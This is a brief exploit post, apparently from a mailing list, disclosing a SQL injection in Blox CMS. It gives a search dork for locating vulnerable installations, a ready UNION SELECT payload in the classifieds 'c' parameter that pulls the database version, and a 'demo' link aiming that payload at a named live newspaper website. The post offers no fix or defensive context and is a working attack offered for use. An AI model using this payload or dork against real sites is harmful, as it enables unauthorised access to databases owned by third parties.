------------------------------------------------------------------------------------------- Blox CMS SQL Injection Vulnerability ------------------------------------------------------------------------------------------- Author: CoBRa_21 Script Home: http://bloxcms.com/ Dork: Powered by Blox CMS from TownNews.com ------------------------------------------------------------------------------------------- Sql Injection: http://localhost/[path]/app/classifieds/rentals/?c=-156%20union%20select%200,1,2,3,4,version%28%29,6,7,8,9,10,11,12,13,14,15 Demo : http://www.dailyrecordnews.com/app/classifieds/rentals/?c=-156%20union%20select%200,1,2,3,4,version%28%29,6,7,8,9,10,11,12,13,14,15 ------------------------------------------------------------------------------------------- _________________________________________________________________ Windows Live Hotmail: Arkadaşlarınız Facebook'taki güncellemelerinizi doğrudan Hotmail®'den alır. http://www.microsoft.com/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:tr-tr:SI_SB_4:092009